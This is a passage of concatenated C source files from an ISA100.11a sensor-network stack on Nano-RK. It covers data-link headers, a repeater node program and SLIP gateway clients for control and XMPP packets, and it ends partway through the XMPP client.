DLMO_NEIGHBOR *neighbor; //pointer to the neighbor that this link is configured for
uint16_t graphId;
uint32_t schedule;
uint8_t chOffset;
uint8_t priority;
} DLMO_LINK;
//************************************extern functions**************************************
extern void configureSlot(uint8_t slotNumber, uint16_t neighborId, LinkType linkType, bool clockSource);
extern void dlmoInit();
extern int8_t addLink (uint8_t slotNumber, DLMO_NEIGHBOR* neighborIndex,LinkType linkType);
extern DLMO_NEIGHBOR* addNeighbor(uint16_t index,uint64_t EUI64, uint8_t groupCode1, uint8_t groupCode2, bool clockSource,uint8_t linkBacklogIndex,uint8_t linkBacklogDur, uint8_t linkBacklogActivate);
extern void sendPacket(uint16_t destAddr, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry)) ;
extern DLMO_LINK * findLink(uint8_t slot);
extern void isaFreePacket(ISA_QUEUE *entry);
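/*
 * Minimal configuration sketch (illustrative, not from the original tree):
 * registers a clock-source neighbor and attaches a transmit-only link to
 * slot 3 using the extern API above. The index, EUI64 and group codes are
 * placeholder values.
 */
static inline void dlmo_example_setup( void )
{
  DLMO_NEIGHBOR *n;
  dlmoInit(); /* reset the link and neighbor tables */
  n = addNeighbor( 1,          /* neighbor table index (placeholder) */
                   0x0001ULL,  /* EUI64 (placeholder)                */
                   0, 0,       /* group codes unused in this sketch  */
                   true,       /* use this neighbor as clock source  */
                   0, 0, 0 );  /* no link backlog configured         */
  if( n != 0 )
    addLink( 3, n, TX_NO_ADV ); /* transmit-only link in slot 3 */
}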
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/projects/final_project/repeater/main.c
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <isa.h>
#include <nrk_error.h>
//#include <sys/time.h>
#define MY_CHANNEL 19
#define MY_ID 2 //change
//#define MY_TX_SLOT_SYNC 2
//#define MY_RX_SLOT 17
#define MY_RX_SLOT 2
#define MY_TX_SLOT 3
#define MY_CLK_SRC_ID 0
NRK_STK Stack1[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
void Task1(void);
void nrk_create_taskset();
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
//uint8_t tx_buf2[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
nrk_time_t timestart;
nrk_time_t timeend;
nrk_time_t newtime;
nrk_time_t timeout;
int main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
isa_task_config();
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t j, i;
uint8_t length,slot;
uint8_t *local_rx_buf;
uint32_t Score = 0;
int8_t rssi;
uint8_t cnt=0;
//uint8_t tx[3]={2,15,16};
//uint8_t rx[3]={3,18,19};
//uint8_t my_tx_slot[4];
char c = -1;
nrk_sig_t uart_rx_signal;
uint8_t finished = 0;
printf( "Task1 PID=%d\r\n",nrk_get_pid());
nrk_led_set(RED_LED);
isa_set_channel_pattern(1);
isa_init (ISA_REPEATER, MY_ID, MY_ID);//change
isa_set_schedule(ISA_REPEATER, MY_CLK_SRC_ID);
isa_set_channel(MY_CHANNEL);
isa_start();
isa_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
while(!isa_ready()) nrk_wait_until_next_period();
/*while(isa_join_ready()!=1) nrk_wait_until_next_period();
for(i=0;i<4;i++){ // set tx slots
if(tx_slot_from_join[i]==0)
break;
else
my_tx_slot[i]=tx_slot_from_join[i];
}
printf("MAIN_TX:%d\r\n",my_tx_slot[0]);*/
printf("isa start!\n\r");
//i=0;
while(1){
//nrk_gpio_toggle(NRK_DEBUG_0);
if( isa_rx_pkt_check()!=0 ) {
local_rx_buf=isa_rx_pkt_get(&length, &rssi);
//printf("length is %d, rssi is %d.\n\r",length,rssi);
//local_rx_buf[PKT_DATA_START+length-2]='\0';
//printf("RX[%d]",slot);
/*for(i=PKT_DATA_START; i<length-1; i++ )
printf( "%c",local_rx_buf[i]);*/
//printf("\r\n");
//sprintf( &tx_buf[PKT_DATA_START],"Hello Mingzhe!");
//length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
//isa_tx_pkt(tx_buf,length,configDHDR(),MY_TX_SLOT);
/*
length=strlen(&rx_buf[PKT_DATA_START])+PKT_DATA_START+1; //change
isa_tx_pkt(rx_buf,length,configDHDR(),MY_TX_SLOT1);//change forward the message from recipient
*/
//printf(" Forward message is sent.\n\r");
//printf("pkt length:%d",length);
//printf("%d\r\n",cnt++);
// printf( "%c",local_rx_buf[PKT_DATA_START]);
isa_rx_pkt_release();
// printf("\r\n");
}
/*sprintf( &tx_buf[PKT_DATA_START],local_rx_buf+PKT_DATA_START);
length=strlen(&rx_buf[PKT_DATA_START])+PKT_DATA_START+1; //change
//isa_tx_pkt(rx_buf,length,configDHDR(),my_tx_slot[0]);//change forward the message from recipient
isa_tx_pkt(rx_buf,length,configDHDR(),MY_TX_SLOT);
isa_wait_until_rx_or_tx ();*/
sprintf( &tx_buf[PKT_DATA_START],"2");
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
isa_tx_pkt(tx_buf,length,configDHDR(),MY_TX_SLOT);
isa_wait_until_rx_or_tx ();
putchar('\n');
putchar('\r');
/*sprintf( &tx_buf2[PKT_DATA_START],"Hello from slot 2!");
length=strlen(&tx_buf2[PKT_DATA_START])+PKT_DATA_START+1;
isa_tx_pkt(tx_buf2,length,configDHDR(),2);
isa_wait_until_rx_or_tx ();*/
}
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 0;
TaskOne.period.nano_secs = 20*NANOS_PER_MS;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 20*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 50*NANOS_PER_MS;
nrk_activate_task (&TaskOne);
nrk_kprintf( PSTR("Create Done\r\n") );
}
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/projects/SAMPL/client_core/sampl_tasks.h
#ifndef _SAMPL_TASKS_H_
#define _SAMPL_TASKS_H_
void sampl_config();
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/src/net/isa/dlmo.h
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
* <NAME>
*******************************************************************************/
#ifndef DLMO_H
#define DLMO_H
//********************************Configure max limits**********************************
#define DLMO_LINK_MAX_COUNT 20
#define DLMO_GRAPH_MAX_COUNT 10
#define DLMO_NEIGHBOR_MAX_COUNT 16
#define TRANSMIT_QUEUE_MAX_SIZE 20
#define DLMO_CANDIDATE_MAX_SIZE 20
#define MAX_RETRIES 3 // the number of working neighbors in the graph should be checked if this changes
//****************************************************************************************
#define ISA_SLOTS_PER_FRAME 50
#define ISA_MAX_SLOTS 63
//************************linkType field in DLMO_LINK******************************
#define TRANSMIT_BIT 0x80
#define RECEIVE_BIT 0x40
#define EXP_BACK_BIT 0x20
#define IDLE_BIT 0x10
#define DISCOVERY 0x0C
#define JOIN_RESPONSE 0x02
#define SELECTIVE 0x01
//Discovery
#define DISCOVERY_NONE 0
#define DISCOVERY_ADVERTISEMENT 1
#define DISCOVERY_BURST 2
#define DISCOVERY_SOLICITATION 3
//SELECTIVE
#define SELECTIVE_ALLOWED 1
#define SELECTIVE_NOT_ALLOWED 0
//enums for linkType
typedef enum {
JOIN_RESP,
TX_NO_ADV,
TX_RX_NO_ADV,
TX_ADV,
ADV,
BURST_ADV,
BURST_ADV_SCAN,
SOLICITATION,
RX
} LinkType;
//***********************************************************************************
typedef enum{
FAILURE,
SUCCESS
} status;
//***********************************************************************************
/* For isa link*/
typedef enum{
DHDR_INDEX=0,
DHR_INDEX=0,
DMXHR_INDEX=1,
DAUX_INDEX=5,
DROUT_INDEX=4, //compressed variant is 3 bytes
DADDR_INDEX=37,
//SLOT_INDEX=6,
SLOT_INDEX=1,
SRC_INDEX=2,//change
DEST_INDEX = 3,
OFFSET_HIGH=1,
OFFSET_LOW=2,
PKT_DATA_START= 7
//PKT_DATA_START=42
} isa_pkt_field_t;
//**********************************************ISA_QUEUE***************************************************
typedef struct ISA_QUEUE ISA_QUEUE;
struct ISA_QUEUE
{
int8_t length;
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
bool transmitPending;
bool usedSlot;
void (*slot_callback)(ISA_QUEUE *, status);
uint8_t priority;
uint16_t neighbor;
nrk_time_t time;
uint8_t numTries;
} ;
//************************************dlmo.neighbor structure***************************************
//for typeInfo
# define CLOCK_NONE 0x00
# define CLOCK_SECONDARY 0x40
# define CLOCK_PREFERRED 0x80
# define CLOCK_RESERVED 0xC0
typedef struct {
bool isPresent;
uint16_t index;
uint64_t EUI64;
uint8_t groupCode1;
uint8_t groupCode2;
uint8_t typeInfo;// 7-6 ClockSource, 5-4 ExtGrCnt, DiagLevel 3-2, LinkBacklog 1,Reserved 0
uint8_t linkBacklogIndex;//
uint8_t linkBacklogDur;//
uint8_t linkBacklogActivate;
}DLMO_NEIGHBOR;
//MACROS for bit manipulation
#define BITSET(x,y) ((x) |= 1<<(y))
#define BITCLEAR(x,y) ((x) &= ~(1<<(y)))
#define BITGET(x,y) ((x) & 1<<(y))
#define ISAMASK(x,y) ((x) & (y))
#define ISASET(x,y) ((x) | (y))
#define SHIFTRIGHT(x,y) ((x)>>(y))
#define SHIFTLEFT(x,y) ((x)<<(y))
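/*
 * Macro semantics at a glance: for BITSET/BITCLEAR/BITGET the second
 * argument is a bit position, so BITSET(x,3) sets bit 3 of x in place,
 * BITCLEAR(x,3) clears it, and BITGET(x,3) is non-zero iff it is set.
 * For ISAMASK/ISASET the second argument is a mask, e.g.
 * ISAMASK(link->linkType, TRANSMIT_BIT) != 0 tests the transmit flag of a
 * linkType byte. SHIFTRIGHT and SHIFTLEFT are plain shifts.
 */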
/*************************************dlmo.Graph***************************************/
#define GRAPH_TYPE_MASK 0x30
#define GRAPH_TYPE_BIT 4
#define NEIGHBOR_COUNT_LOWER_BIT 4
#define NEIGHBOR_COUNT_MASK 0x70
typedef struct{
uint16_t index;
/*
* dlmo.Graph[].PreferredBranch. If this indicator is 1, treat the first listed neighbor as the
preferred branch, and the DL should wait until there is an opportunity to try at least one
transmission along the preferred branch before attempting other alternatives. If this
indicator is 0, do not give such preferential treatment to the first listed neighbor.
• dlmo.Queue allows the system manager to reserve up to 15 buffers of the message queue
for DPDUs that are following the graph.
*
*/
uint8_t info; // Preferred branch (1)NeighborCount(3)Queue(4)
/*
* dlmo.Graph[].MaxLifetime (units 1⁄4 s). If this element is non-zero, the value of
dlmo.MaxLifetime shall be overridden for all DPDUs being forwarded following this graph.
*
*/
uint8_t maxLifeTime;
/*
* List of neighbors (commonly two neighbors for next-hop link diversity).
*/
uint16_t neighbor[3];
}DLMO_GRAPH;
// ********************************* dlmo.link structure *******************************
//For graphType subfield
typedef enum{
NEIGHBOR,
GRAPH,
GRAPH_NEIGHBOR
}GraphType;
typedef struct {
bool isPresent;
uint16_t index;
/*
* dlmo.SuperframeIndex. Indicates the superframe reference for the link.
*
*/
uint8_t superframeIndex;
/*
* Indicates how the link is configured for transmission and/or reception,
* and/or neighbor discovery. See Table 182.
*
*/
uint8_t linkType;
/*
* dlmo.Link[].Template1. Primary timeslot template. See 9.4.3.3 for a discussion of
* templates.
*
*/
uint8_t template1;
/*
* dlmo.Link[].Template2. Secondary timeslot template, for transmit/receive (TR) slots only,
in combination with other link selections. Use Template2 as the receive template, if there
is no DPDU in the queue for the primary template. Template 2 is transmitted and
meaningful only for TRx links, that is, links where Link[].Type bits 6 and 7 both have a
value of 1.
*
*/
uint8_t template2;
uint8_t typeInfo; //Neighbor Type(7,6) |Graph Type (5,4) | Sched Type (3,2) | ChType(1) | Priority Type(0)
/*
* A neighbor is designated for transmit
* links. See 9.4.3.4 for a discussion of neighbors. When a neighbor is designated in a link, it
* may reference either a dlmo.Neighbor index or a group
*
*/
DLMO_NEIGHBOR *neighbor; //pointer to the neighbor that this link is configured for
/*
* DPDUs following a particular graph may be
given exclusive or priority access to certain transmit links. These fields, when so
configured, limit link access to certain graphs, thereby connecting the link to a particular
communication flow through the DL subnet. When GraphType is left blank, the transmit
link is available to any DPDU that is being routed through the link’s designated neighbor.
When GraphType is used, a particular graph is given exclusive or priority access to the
link.
*
*/
DLMO_GRAPH* graphPtr; //pointer to the graph that is configured for this link
/*
* dlmo.Link[].SchedType, dlmo.Link[].Schedule. Indicates the timeslot position(s) of the link
within each superframe cycle. The schedule may designate a fixed offset, a fixed set of
intervals, a range, or a bitmap.
• 0=Offset only
• 1=Offset and interval
• 2=Range
• 3=Bitmap
*
*/
uint32_t schedule;
/*
* Indicates how the link’s channel is selected
*
*/
uint8_t chOffset;
/*
* Indicates how the links priority is set. Link
priorities are functionally described in 9.1.8.5.
*
*/
uint8_t priority;
} DLMO_LINK;
// *******************************Alert report Descriptor **************************
typedef struct {
bool alertReportDisabled;
uint8_t alertReportPriority;
}ALERT_REPORT;
/*
*
Descriptor
Type: Alert Report Descriptor (Table 257)
Default: Disabled=False
Default: Priority=0
Duration
Type: Unsigned16
Units: 1 s
Default: 60
*
*
*/
typedef struct {
ALERT_REPORT alertReport;
uint16_t duration;
}DLMO_DISCOVERY_ALERT;
//************************************ dlmo.Candidate***********************************
typedef struct {
/*
* dlmo.Candidates.Neighbor N is the 16-bit address of each candidate neighbor in the DL
* subnet.
*/
uint16_t neighbor;
/*
* dlmo.RSSI N indicates the strength of the radio signal from each candidate neighbor,
* based on received advertisements and possibly other DPDUs. See 9.1.15.2 for description
* of RSSI.
*
*/
uint8_t rssi;
/*
* dlmo.RSQI N indicates the quality of the radio signal from each candidate neighbor, based
* on received advertisements and possibly other considerations. A higher number indicates
* a better radio signal. See 9.1.15.2. for description of RSQI. If the chipset does not support
* RSQI, i.e.
*/
uint8_t rsqi;
}CANDIDATE;
typedef struct {
uint8_t n; //represents the number of neighbors that have been discovered
CANDIDATE candidate[DLMO_CANDIDATE_MAX_SIZE]; //candidate information
}DLMO_CANDIDATE;
//************************************ extern variables ***********************************
extern uint8_t isa_clk_src_id;
//************************************extern functions**************************************
extern void configureSlot(uint8_t slotNumber, uint16_t neighborId, LinkType linkType, bool clockSource, uint16_t graphId, uint8_t neighborCount, uint16_t n1, uint16_t n2, uint16_t n3, uint8_t graphType);
extern void dlmoInit();
extern DLMO_GRAPH* addGraph(uint16_t graphId, uint8_t neighborCount, uint16_t n1, uint16_t n2, uint16_t n3);
extern int8_t addLink(uint8_t slotNumber, uint16_t neighborId,uint16_t graphId , LinkType linkType, GraphType graphType);
extern DLMO_NEIGHBOR* addNeighbor(uint16_t index,uint64_t EUI64, uint8_t groupCode1, uint8_t groupCode2, bool clockSource,uint8_t linkBacklogIndex,uint8_t linkBacklogDur, uint8_t linkBacklogActivate);
extern void dd_data_indication(uint16_t srcAddr,uint16_t destAddr,uint8_t priority,bool discardEligibile, bool lh, uint8_t length, uint8_t *payload);
extern void sendPacket(uint16_t destAddr,uint8_t graphId, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry, status)) ;
extern DLMO_LINK * findLink(uint8_t slot);
extern bool isTransmitLinkPresent (uint8_t *payloadr);
extern void isaFreePacket(ISA_QUEUE *entry);
extern void clearCandidateTable();
extern int8_t addCandidate(uint16_t candidate);
extern bool isDiscoveryAlertDue();
extern void updateLastSentTime();
extern int8_t sendAdv ();
extern void flushCandidateEntries();
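/*
 * Hedged transmit sketch (illustrative, not from the original tree):
 * queues a payload to neighbor 0x0002 over graph 1 using only the extern
 * API declared above, and releases the queue entry from the completion
 * callback. Destination, graph id and payload bytes are placeholders.
 */
static inline void isa_tx_callback_example( ISA_QUEUE *entry, status s )
{
  if( s == FAILURE ) {
    /* retries are handled inside the DL (MAX_RETRIES); just log here */
  }
  isaFreePacket( entry ); /* always return the buffer to the queue */
}

static inline void isa_send_example( void )
{
  static uint8_t payload[4] = { 0xDE, 0xAD, 0xBE, 0xEF };
  sendPacket( 0x0002, 1, sizeof( payload ), payload,
              isa_tx_callback_example );
}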
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/projects/SAMPL/slip-clients/tests/control-pkt/.svn/text-base/main.c.svn-base
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sampl.h>
#include <slipstream.h>
#include <ack_pkt.h>
#include <ff_basic_sensor_pkt.h>
//#include "tree_route.h"
//#include "slipstream.h"
#define gw_mac 0
uint8_t debug_txt_flag;
#define NONBLOCKING 0
#define BLOCKING 1
#define HEX_STR_SIZE 5
void handle_incomming_pkt(uint8_t *rx_buf,uint8_t len);
void error(char *msg);
void print_ds_packet(SAMPL_DOWNSTREAM_PKT_T *ds_pkt );
void print_gw_packet(SAMPL_GATEWAY_PKT_T *gw_pkt );
int sockfd, portno, n;
struct sockaddr_in serv_addr;
struct hostent *server;
int size;
char buffer[2048];
SAMPL_DOWNSTREAM_PKT_T ds_pkt;
int main (int argc, char *argv[])
{
FILE *fp;
uint8_t tx_buf[128];
uint8_t rx_buf[128];
int32_t v,cnt,i,len;
uint8_t nav_time_secs, reply_time_secs,checksum;
int32_t tmp;
time_t reply_timeout,nav_timeout,t;
uint8_t cmd,error;
char buf[1024];
debug_txt_flag=0;
if (argc < 3 || argc > 4) {
printf ("Usage: server port [-d]\n");
printf (" d Debug Output\n");
exit (1);
}
if(argc==4)
{
// Grab dash command line options
if(strstr(argv[3],"d")!=NULL )
{
debug_txt_flag=1;
}
}
v=slipstream_open(argv[1],atoi(argv[2]),NONBLOCKING);
nav_time_secs=25;
cnt = 0;
while (1) {
error=0;
cmd=0;
// Setup the packet to send out to the network
// These values setup the internal data structure and probably don't
// need to be changed
ds_pkt.payload_len=0;
ds_pkt.buf=tx_buf;
ds_pkt.buf_len=DS_PAYLOAD_START;
ds_pkt.payload_start=DS_PAYLOAD_START;
ds_pkt.payload=&(tx_buf[DS_PAYLOAD_START]);
// These are parameters that can be adjusted for different packets
ds_pkt.pkt_type=CONTROL_PKT;
ds_pkt.ctrl_flags= DS_MASK | LINK_ACK | DEBUG_FLAG;
ds_pkt.seq_num=cnt;
ds_pkt.priority=0;
ds_pkt.ack_retry=10;
ds_pkt.subnet_mac[0]=0;
ds_pkt.subnet_mac[1]=0;
ds_pkt.subnet_mac[2]=0;
ds_pkt.hop_cnt=0; // Starting depth, always keep at 0
ds_pkt.hop_max=5; // Max tree depth
ds_pkt.delay_per_level=1; // Reply delay per level in seconds
ds_pkt.nav=30; // Time in seconds until next message to be sent
ds_pkt.mac_check_rate=100; // B-mac check rate in ms
ds_pkt.rssi_threshold=-40; // Reply RSSI threshold
ds_pkt.last_hop_mac=0;
ds_pkt.mac_filter_num=0; // Increase if MAC_FILTER is active
ds_pkt.aes_ctr[0]=0; // Encryption AES counter
ds_pkt.aes_ctr[1]=0;
ds_pkt.aes_ctr[2]=0;
ds_pkt.aes_ctr[3]=0;
ds_pkt.payload[0]=(-40);
ds_pkt.payload[1]=0x01;
ds_pkt.payload[2]=0;
ds_pkt.payload[3]=60;
ds_pkt.payload[4]=0;
ds_pkt.payload[5]=60;
checksum=0;
for(i=0; i<6; i++ )
checksum+=ds_pkt.payload[i];
ds_pkt.payload[6]=checksum;
ds_pkt.payload_len=7;
// This takes the structure and packs it into the raw
// array that is sent using SLIP
pack_downstream_packet( &ds_pkt);
// Add MAC filter entries below
// downstream_packet_add_mac_filter( &ds_pkt, 2 );
// downstream_packet_add_mac_filter( &ds_pkt, 3 );
// downstream_packet_add_mac_filter( &ds_pkt, 4 );
// downstream_packet_add_mac_filter( &ds_pkt, 5 );
// Print your packet on the screen
if(debug_txt_flag==1)
print_ds_packet(&ds_pkt );
cnt++;
if(error==0)
v=slipstream_send(ds_pkt.buf,ds_pkt.buf_len);
if(debug_txt_flag==1)
{
if (v == 0) printf( "Error sending\n" );
else printf( "Sent request %d\n",ds_pkt.seq_num);
}
nav_time_secs=ds_pkt.nav;
reply_time_secs=ds_pkt.delay_per_level * ds_pkt.hop_max;
t=time(NULL);
reply_timeout=t+reply_time_secs+1;
nav_timeout=t+nav_time_secs;
// Collect Reply packets
while(reply_timeout>time(NULL))
{
v=slipstream_receive( rx_buf);
if (v > 0) {
handle_incomming_pkt(rx_buf,v);
}
usleep(1000);
}
// Wait for the NAV and service incoming messages
// This is the time window when the network is idle and can
// be used for asynchronous communications.
while(nav_timeout>time(NULL))
{
v=slipstream_receive( rx_buf);
if (v > 0) {
// Check for mobile/p2p packets
handle_incomming_pkt(rx_buf,v);
}
usleep(1000);
}
}
}
void handle_incomming_pkt(uint8_t *rx_buf,uint8_t len)
{
int i;
SAMPL_GATEWAY_PKT_T gw_pkt;
FF_SENSOR_SHORT_PKT_T sensor_short;
ACK_PKT_T ack;
printf( "Raw Pkt [%d] = ",len );
for(i=0; i<len; i++ ) printf( "%d ",rx_buf[i] );
printf( "\n" );
gw_pkt.buf=rx_buf;
gw_pkt.buf_len=len;
unpack_gateway_packet(&gw_pkt );
// You will have a gateway packet here to operate on.
// The gateway packet has a payload which contains user defined packets.
// Lets print the raw packet:
print_gw_packet(&gw_pkt);
// Now lets parse out some application data:
switch(gw_pkt.pkt_type)
{
// PING and ACK are the same
case PING_PKT:
case ACK_PKT:
for(i=0; i<gw_pkt.num_msgs; i++ )
{
ack_pkt_get( &ack, gw_pkt.payload, i);
printf( "Ack pkt from 0x%x\n",ack.mac_addr );
}
break;
// Default FireFly sensor packet
case FF_SENSOR_SHORT_PKT:
for(i=0; i<gw_pkt.num_msgs; i++ )
{
sensor_short_pkt_get( &sensor_short, gw_pkt.payload, i);
printf( "Sensor pkt from 0x%x",sensor_short.mac_addr );
printf( " Light: %d",sensor_short.light);
printf( " Temperature: %d",sensor_short.temperature);
printf( " Acceleration: %d",sensor_short.acceleration);
printf( " Sound Level: %d",sensor_short.sound_level);
printf( " Battery: %d",sensor_short.battery+100);
}
break;
}
}
void print_ds_packet(SAMPL_DOWNSTREAM_PKT_T *ds_pkt )
{
int i;
printf( "Downstream Packet Header info:\n" );
printf( " pkt type\t\t0x%x\n",ds_pkt->pkt_type);
printf( " ctrl flags\t\t0x%x\n",ds_pkt->ctrl_flags );
printf( " seq num\t\t0x%x\n",ds_pkt->seq_num );
printf( " priority\t\t0x%x\n",ds_pkt->priority);
printf( " ack retry\t\t0x%x\n",ds_pkt->ack_retry);
printf( " subnet mac\t\t0x%x\n",ds_pkt->subnet_mac[0]);
printf( " hop_cnt\t\t0x%x\n",ds_pkt->hop_cnt);
printf( " hop_max\t\t0x%x\n",ds_pkt->hop_max);
printf( " delay_per_level\t%d seconds\n",ds_pkt->delay_per_level);
printf( " nav\t\t\t%d seconds\n",ds_pkt->nav);
printf( " mac_check_rate\t%d ms\n",ds_pkt->mac_check_rate);
printf( " rssi_threshold\t%d\n",(int8_t)ds_pkt->rssi_threshold);
printf( " last_hop_mac\t\t0x%x\n",ds_pkt->last_hop_mac);
printf( " mac_filter_num\t0x%x\n",ds_pkt->mac_filter_num);
printf( " aes_ctr\t\t0x%x 0x%x 0x%x 0x%x\n",ds_pkt->aes_ctr[3], ds_pkt->aes_ctr[3],
ds_pkt->aes_ctr[2], ds_pkt->aes_ctr[1], ds_pkt->aes_ctr[0]);
printf( "Mac Filter List: " );
for(i=0; i<ds_pkt->mac_filter_num; i++ )
printf( "0x%x ",ds_pkt->buf[DS_PAYLOAD_START+i] );
printf( "\n\n" );
printf( "Payload Data: " );
for(i=0; i<ds_pkt->payload_len; i++ )
printf( "0x%x ",ds_pkt->payload[i] );
printf( "\n\n" );
}
void print_gw_packet(SAMPL_GATEWAY_PKT_T *gw_pkt )
{
int i;
printf( "Gateway Packet Header info:\n" );
printf( " pkt type\t\t0x%x\n",gw_pkt->pkt_type);
printf( " ctrl flags\t\t0x%x\n",gw_pkt->ctrl_flags );
printf( " seq num\t\t0x%x\n",gw_pkt->seq_num );
printf( " priority\t\t0x%x\n",gw_pkt->priority);
printf( " ack retry\t\t0x%x\n",gw_pkt->ack_retry);
printf( " subnet mac\t\t0x%x\n",gw_pkt->subnet_mac[0]);
printf( " src mac\t\t0x%x\n",gw_pkt->src_mac);
printf( " dst mac\t\t0x%x\n",gw_pkt->dst_mac);
printf( " last hop mac\t\t0x%x\n",gw_pkt->last_hop_mac);
printf( " rssi\t\t0x%x\n",gw_pkt->rssi);
printf( "Payload Data: " );
for(i=0; i<gw_pkt->payload_len; i++ )
printf( "0x%x ",gw_pkt->payload[i] );
printf( "\n\n" );
}
void error(char *msg)
{
perror(msg);
exit(0);
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/projects/SAMPL/slip-clients/xmpp-client/main.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include "../../include/sampl.h"
#include <slipstream.h>
#include <lm-library.h>
#include "node_list.h"
#include "globals.h"
#include "xmpp_pkt_writer.h"
#include "sensor_cal.h"
#include <loudmouth/loudmouth.h>
#define SEQ_CACHE_SIZE 24
#define IGNORE_PACKET 0
#define US_PACKET 1
#define P2P_PACKET 2
uint8_t gw_subnet_2;
uint8_t gw_subnet_1;
uint8_t gw_subnet_0;
uint8_t gw_mac;
#define NONBLOCKING 0
#define BLOCKING 1
#define HEX_STR_SIZE 5
static void handle_xmpp_msgs ( LmMessage *m);
void handle_incomming_pkt(uint8_t *rx_buf,uint8_t len);
void error(char *msg);
void print_ds_packet(SAMPL_DOWNSTREAM_PKT_T *ds_pkt );
void check_and_create_node(char *node_name);
int sockfd, portno, n;
struct sockaddr_in serv_addr;
struct hostent *server;
int size,error_debug_txt_flag=1;
char buffer[2048];
void seq_num_cache_init();
int seq_num_cache_check( uint8_t *mac_addr, uint8_t seq_num, uint8_t pkt_type);
typedef struct seq_num_cache {
uint8_t addr[4];
uint8_t seq_num;
uint8_t pkt_type;
int valid;
} seq_num_cache_t;
seq_num_cache_t seq_cache[SEQ_CACHE_SIZE];
SAMPL_DOWNSTREAM_PKT_T ds_pkt;
char slip_server[MAX_BUF];
uint32_t slip_port;
FILE *fp;
char buf[1024];
static void handle_xmpp_msgs ( LmMessage *m )
{
printf( "XMPP message handler\n" );
}
void *main_publish_loop(gpointer data)
{
uint8_t tx_buf[MAX_BUF];
uint8_t rx_buf[MAX_BUF];
int32_t v,i,len;
uint8_t seq_num;
uint8_t nav_time_secs;
uint8_t reply_time_secs;
int32_t tmp;
time_t reply_timeout, nav_timeout,t;
uint8_t cmd_ready,error,ret;
char token[64];
char name[64];
printf( "Adding gateway node\n" );
if(xmpp_flag==1)
{
//sscanf(username,"%[^@]",name);
sprintf( name, "%02x%02x%02x%02x",gw_subnet_2, gw_subnet_1, gw_subnet_0, gw_mac );
node_list_add(name);
}
if(xmpp_flag==1)
{
// generate parent node for gateway
ret = create_event_node(connection, name,NULL,FALSE);
if(ret != XMPP_NO_ERROR) {
if(ret == XMPP_ERROR_NODE_EXISTS)
if(debug_txt_flag) printf("Node '%s' already exists\n",name);
else {
g_printerr("Could not create event node '%s'. Error='%s'\n",name,ERROR_MESSAGE(ret));
return -1;
}
} else if(debug_txt_flag) printf("Created event node '%s'\n",name);
}
v=slipstream_open(slip_server,slip_port,NONBLOCKING);
//v=slipstream_open(argv[1],atoi(argv[2]),NONBLOCKING);
seq_num = 0;
while (1) {
error=0;
cmd_ready=0;
// Read Data packet from script file
while(cmd_ready==0)
{
v=fscanf( fp, "%[^\n]\n", buf);
if(v==-1) rewind(fp);
if(buf[0]!='#' && v!=-1)
{
uint8_t offset;
offset=0;
i=0;
tmp=1;
if(error_debug_txt_flag==1) printf( "108: Parsing line\n" );
while(tmp==1) {
tmp=sscanf( &buf[offset*HEX_STR_SIZE],"0x%x ",&tx_buf[i] );
// printf( "i=%d tmp=%d val=0x%x\n",i,tmp,tx_buf[i] );
if(tmp==1) { offset++; i++; }
}
if(error_debug_txt_flag==1) printf( "116: Parsing line done\n" );
len=offset;
ds_pkt.buf_len=offset;
ds_pkt.buf=tx_buf;
// write to the structure and raw buffer
// We end up transmitting the raw buffer after adding the correct sequence number
// also load the correct subnet mac from the command line input
tx_buf[SUBNET_MAC_2]=gw_subnet_2;
